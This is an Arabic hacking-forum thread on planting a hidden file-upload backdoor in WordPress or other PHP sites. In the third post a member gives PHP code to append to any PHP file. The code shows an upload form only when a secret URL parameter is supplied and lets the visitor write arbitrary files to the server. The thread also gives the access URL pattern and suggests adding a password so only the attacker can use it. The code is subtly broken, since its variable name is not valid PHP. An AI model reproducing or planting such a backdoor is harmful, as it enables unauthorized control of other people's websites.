حالة الموضوع:
مغلق
  1. th3 Spl0it

    th3 Spl0it Developer

    الأنتساب:
    ‏10 مارس 2015
    المشاركات:
    116
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    shad0w ~/ [#]
    السلام عليكم

    شباب كيفكم

    عندي استفسار مريت موقع على سيرفر مستهدفه
    وحصلت ملف ?author=1
    ملغوم في ملف رفع وهذا شيء حلوو اختصر علي فحص كامل ..


    لكن سؤالي .. > احد يعرف الطريقه هذي كيف يتم عملها ..؟
     
  2. Windows Hacker

    Windows Hacker V • I • P

    الأنتساب:
    ‏26 يوليو 2014
    المشاركات:
    636
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    الإقامة:
    |[ Occupied Bahrain ]|
    رد: عن تلغيم مدونات الورد بريس

    فكرة جميلة و لكن بهآ عيب وآحد آن آلطريقة ستبعد صآحب آلموقع و لكنهآ ستجلب آلهكر ، بآلتوفيق و بآنتظآر آلخبرآء :) ..
     
  3. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    رد: عن تلغيم مدونات الورد بريس

    وعليكم السلآم ورحمة الله وبركاتة

    طريقة قديمة واسخدمها انا شخصيآ , الطريقة كالآتي

    ضع هذا الكود في اي ملف php

    مراعيآ التغييرات اذا كان الملف الي تريد تحقن مركز الرفع بي امسح <?php من الكود ادناه

    وضع باقي هذا الكود في نهاية الملف وتئكد من نهاية سورس الملف الي تريد تلغمة منهي كذا ?>

    <?php

    $IQ-Mokhalad = $_GET['IQ-Mokhalad'];

    if($IQ-Mokhalad == 'IQ-Mokhalad'){

    $filename = $_FILES['file']['name'];
    $filetmp = $_FILES['file']['tmp_name'];

    echo "<form method='POST' enctype='multipart/form-data'>
    <input type='file'name='file' />
    <input type='submit' value='go' />

    </form>";

    move_uploaded_file($filetmp,$filename);
    }
    ?>

    استعراض مركز الرفع كـ الاتي

    www.***.com/file.php?IQ-Mokhalad=IQ-Mokhalad

    اي مشكلة تواجهة في اختراق المواقع او برمجة php انا بالخدمة بـ التوفيق وردة

    #مخـٌلد

    !$_@


     
  4. th3 Spl0it

    th3 Spl0it Developer

    الأنتساب:
    ‏10 مارس 2015
    المشاركات:
    116
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    shad0w ~/ [#]
    رد: عن تلغيم مدونات الورد بريس

    شكرا لكم حبايبي ..

    حصلت الملف كان بالثيم ..

    بخصوص جلب الهكر بامكانك وضع يوزر وباسورد
    على الملف بحيث ما يقدر احد
    يستخدمه غيرك

    محتار مدري في الي افضل اجابه لك الثانيه
    اشوفها كانت صائبه لمن يبحث ع الطريقه
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة